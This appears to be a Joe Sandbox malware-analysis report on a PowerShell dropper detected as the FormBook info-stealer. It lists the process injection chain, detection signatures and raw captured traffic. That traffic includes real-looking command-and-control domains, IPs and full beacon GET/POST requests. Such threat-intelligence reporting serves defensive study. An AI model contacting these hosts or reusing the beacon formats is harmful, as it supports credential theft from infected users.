Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LLLLLLLLASSSEERRRR.ps1

Overview

General Information

Sample name:LLLLLLLLASSSEERRRR.ps1
Analysis ID:1615024
MD5:48ad8b6a207ff9dd09d652e96d1126e3
SHA1:d8f92da428011292f8565e88bbe70410809f6462
SHA256:c3201db81449ee8d250a922e98847c0465f85bc6dfd95045c731b02925f835d1
Tags:196-251-92-64ps1user-JAMESWT_MHT
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • x.exe (PID: 7616 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E6BB2F3D369794262E51FC97BA9672E9)
      • RegAsm.exe (PID: 7668 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • y85te3vqfc6QGAKyw78l.exe (PID: 2772 cmdline: "C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\ybvre74SC.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • runonce.exe (PID: 8028 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)
            • y85te3vqfc6QGAKyw78l.exe (PID: 1604 cmdline: "C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\LN17FRKCEk.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
            • firefox.exe (PID: 5464 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • notepad.exe (PID: 7552 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2613383446.0000000004F30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.1835704349.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.2613236980.0000000004EE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000D.00000002.2612552379.00000000013C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.1836454389.0000000002BB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              5.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5568, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1", ProcessId: 7352, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5568, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1", ProcessId: 7352, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-14T12:37:22.233047+010028554651A Network Trojan was detected192.168.2.959019162.218.30.23580TCP
                2025-02-14T12:37:46.281283+010028554651A Network Trojan was detected192.168.2.959023103.106.67.11280TCP
                2025-02-14T12:37:59.838826+010028554651A Network Trojan was detected192.168.2.959027104.21.48.180TCP
                2025-02-14T12:38:13.481500+010028554651A Network Trojan was detected192.168.2.959031104.21.112.180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-14T12:37:38.303274+010028554641A Network Trojan was detected192.168.2.959020103.106.67.11280TCP
                2025-02-14T12:37:40.857309+010028554641A Network Trojan was detected192.168.2.959021103.106.67.11280TCP
                2025-02-14T12:37:43.403146+010028554641A Network Trojan was detected192.168.2.959022103.106.67.11280TCP
                2025-02-14T12:37:52.844518+010028554641A Network Trojan was detected192.168.2.959024104.21.48.180TCP
                2025-02-14T12:37:54.609147+010028554641A Network Trojan was detected192.168.2.959025104.21.48.180TCP
                2025-02-14T12:37:57.281454+010028554641A Network Trojan was detected192.168.2.959026104.21.48.180TCP
                2025-02-14T12:38:05.620076+010028554641A Network Trojan was detected192.168.2.959028104.21.112.180TCP
                2025-02-14T12:38:08.157473+010028554641A Network Trojan was detected192.168.2.959029104.21.112.180TCP
                2025-02-14T12:38:10.771982+010028554641A Network Trojan was detected192.168.2.959030104.21.112.180TCP
                2025-02-14T12:38:19.829823+010028554641A Network Trojan was detected192.168.2.959032134.122.135.4880TCP
                2025-02-14T12:38:22.481853+010028554641A Network Trojan was detected192.168.2.959033134.122.135.4880TCP
                2025-02-14T12:38:25.219377+010028554641A Network Trojan was detected192.168.2.959034134.122.135.4880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.tumbetgirislinki.fit/k566/Avira URL Cloud: Label: malware
                Source: http://www.seasay.xyz/c9ts/Avira URL Cloud: Label: malware
                Source: http://www.lucynoel6465.shop/jgkl/Avira URL Cloud: Label: malware
                Source: http://www.kjuw.party/e0jv/Avira URL Cloud: Label: malware
                Source: https://www.seasay.xyz/c9ts/?ddE=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Dropper.Gen
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 61%
                Multi AV Scanner detection for submitted file
                Source: LLLLLLLLASSSEERRRR.ps1ReversingLabs: Detection: 24%
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2613383446.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1835704349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2613236980.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2612552379.00000000013C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1836454389.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2602590342.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1838271008.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2613263682.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Binary string: runonce.pdbGCTL source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2608539411.000000000085E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000005.00000002.1836620489.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.1838270102.000000000509F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.0000000005250000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.00000000053EE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.1835974299.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000005.00000002.1836620489.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 0000000A.00000003.1838270102.000000000509F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.0000000005250000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.00000000053EE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.1835974299.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: runonce.pdb source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2608539411.000000000085E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: VZXCSD.pdb source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1344241466.00000000003FE000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
                Source: Binary string: VZXCSD.pdbX source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1344241466.00000000003FE000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000000.1756318795.000000000012F000.00000002.00000001.01000000.0000000B.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2602571364.000000000012F000.00000002.00000001.01000000.0000000B.sdmp
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0326C8D0 FindFirstFileW,FindNextFileW,FindClose,10_2_0326C8D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 4x nop then xor eax, eax10_2_03259EF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 4x nop then mov ebx, 00000004h10_2_050304E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:59027 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59022 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59020 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:59019 -> 162.218.30.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59025 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59029 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59021 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:59031 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59024 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59032 -> 134.122.135.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:59023 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59030 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59028 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59034 -> 134.122.135.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59033 -> 134.122.135.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59026 -> 104.21.48.1:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.l63339.xyz
                Source: DNS query: www.seasay.xyz
                Source: global trafficTCP traffic: 192.168.2.9:58925 -> 162.159.36.2:53
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewIP Address: 103.106.67.112 103.106.67.112
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /vhr7/?uxPH=qD4HNfCp70&ddE=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4o2GNlbdMtrDimVv8q0bADTP2MW58ag== HTTP/1.1Host: www.l63339.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficHTTP traffic detected: GET /c9ts/?ddE=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7UxshhdjBGkpYiovfB8EVbaaI8Ibdvw==&uxPH=qD4HNfCp70 HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficHTTP traffic detected: GET /k566/?uxPH=qD4HNfCp70&ddE=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe6OYJ2CZYvza1X4jE5qPwznFDfci4lg== HTTP/1.1Host: www.tumbetgirislinki.fitAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficHTTP traffic detected: GET /jgkl/?ddE=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpe8No0hPfAwO5oFY7qBV6wzFyOtp6qA==&uxPH=qD4HNfCp70 HTTP/1.1Host: www.lucynoel6465.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                Source: global trafficDNS traffic detected: DNS query: www.l63339.xyz
                Source: global trafficDNS traffic detected: DNS query: www.seasay.xyz
                Source: global trafficDNS traffic detected: DNS query: www.tumbetgirislinki.fit
                Source: global trafficDNS traffic detected: DNS query: www.lucynoel6465.shop
                Source: global trafficDNS traffic detected: DNS query: www.kjuw.party
                Source: unknownHTTP traffic detected: POST /c9ts/ HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.seasay.xyzReferer: http://www.seasay.xyz/c9ts/Content-Length: 192Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5Data Raw: 64 64 45 3d 57 30 4a 59 34 44 6c 67 38 7a 6d 57 35 46 36 57 58 32 78 58 4d 50 49 78 69 4a 75 36 49 52 48 59 6e 55 4c 6b 7a 41 74 66 75 65 4b 75 72 51 35 70 50 52 74 73 32 58 79 46 63 6c 75 6f 49 52 59 54 59 4b 44 4b 54 43 74 31 59 32 2f 49 30 47 63 49 70 45 34 70 57 54 45 55 36 4b 7a 67 50 58 5a 69 6f 64 6d 78 4c 71 6f 66 58 49 2b 4c 37 36 62 4b 35 66 52 48 31 69 32 65 45 32 57 75 44 59 42 30 36 32 51 56 2f 32 4d 73 62 32 48 6b 75 32 32 5a 47 36 32 51 35 4f 2b 50 30 55 43 61 74 4b 43 4f 30 4e 36 54 63 47 31 6d 74 42 6d 38 77 75 39 44 2b 79 52 2b 56 7a 4e 70 66 38 65 37 Data Ascii: ddE=W0JY4Dlg8zmW5F6WX2xXMPIxiJu6IRHYnULkzAtfueKurQ5pPRts2XyFcluoIRYTYKDKTCt1Y2/I0GcIpE4pWTEU6KzgPXZiodmxLqofXI+L76bK5fRH1i2eE2WuDYB062QV/2Msb2Hku22ZG62Q5O+P0UCatKCO0N6TcG1mtBm8wu9D+yR+VzNpf8e7
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:37:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LW0oLJBvAKwPhNb%2FPpFAXdgW8Fw84NTfg%2B%2F3qfAo29W2xtn3zLKXB3uM7VdZrEUgjXYNT28%2Fl6D3tIWgf2%2BWG4Ch32O3FfnSB%2FvjxKEC5Ch3tAQ3sHXuRncAGG15sT9LrtrLX52Mk2ya7wc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cc4d23a2a7c94-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1782&min_rtt=1782&rtt_var=891&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=839&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 32 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a 59 93 a3 48 92 7e ef 5f a1 ad b5 35 9b 31 2a 87 fb ca ae 6a 5b 6e 90 04 02 04 08 f4 c6 0d e2 14 b7 34 36 ff 7d 4d 99 d5 d5 59 59 52 75 f5 ce 3e 6c bc 88 20 dc 3d c2 af cf 43 11 fc f2 cb 2f 9f fe 83 df 71 96 a7 0b ab 6c a8 ca df 7e f9 f4 fa b3 5a ad 56 9f b2 d8 8f be 3c 56 f1 e0 af b2 61 68 9f e2 f3 98 4f 9f 3f 70 4d 3d c4 f5 f0 34 5c da f8 c3 2a 7c ed 7d fe 30 c4 cb 00 de 44 fc ba 0a 33 bf eb e3 e1 f3 38 24 4f d4 87 87 72 fc 30 8b 9f 6e fc 5d 53 be 11 54 37 4f e1 6d e8 21 a3 de f9 69 e5 ff 15 0e 61 69 f3 2e ee df b0 40 df d0 d6 7e 15 7f fe 30 e5 f1 dc 36 dd f0 86 6c ce a3 21 fb 1c c5 53 1e c6 4f 2f 9d 8f ab bc ce 87 dc 2f 9f fa d0 2f e3 cf f0 3f be 8a 1a f2 a1 8c 7f c3 20 6c a5 35 c3 4a 6c c6 3a fa 04 be be 7c 25 e8 87 4b 19 af 6e 76 fb 62 ae b0 ef bf 30 df 5a d0 44 97 d5 3f bf 76 6f 2d 69 ea e1 29 f1 ab bc bc 3c af 98 2e f7 cb 8f 2b 39 2e a7 78 c8 43 ff e3 aa f7 eb fe a9 8f bb 3c f9 f5 7b b6 3e bf c6 cf 2b 18 6b 97 6f 07 cb bc 8e 9f b2 38 4f b3 e1 79 05 ff 03 43 Data Ascii: 102dZYH~_51*j[n46}MYYRu>l =C/ql~ZV<VahO?pM=4\*|}0D38$Or0n]ST7Om!iai.@~06l!SO///? l5Jl:|%Knvb0ZD?vo-i)<.+9.xC<{>+ko8OyC
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:37:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X6bW4OnaLd%2FWD21cnxWtYZeArMKWBgBrg6oianpWAv38cclKZXlXppwIlQD7TEJbVIgdKf%2FGN4agKcPjDIqUIK%2FM2qrFyJ%2FWNeloUcOIwqnywwnblH8ieG8H6522HcdXMCXX9%2Be68fcGVpY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cc4e2dccf1a24-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1887&min_rtt=1887&rtt_var=943&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1852&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 31 32 66 62 0d 0a cc 5a 59 97 a3 4a 72 7e bf bf 42 ae 39 b6 67 0e 5d cd be d5 ad 6a 1b 10 12 48 02 01 12 92 d0 cb 3d 09 24 8b 58 c5 2e f9 cc 0f f2 df f0 2f f3 51 55 2f d5 55 52 77 df 19 3f 38 1f 4a 64 66 44 64 64 2c 5f 50 99 fc f6 db 6f 8f ff 32 5e 4a 6b c7 90 47 51 93 a5 9f 7e 7b 7c f9 19 8d 46 a3 c7 08 02 ff f3 63 06 1b 30 8a 9a a6 bc 87 c7 36 ee 9e ee a4 22 6f 60 de dc 37 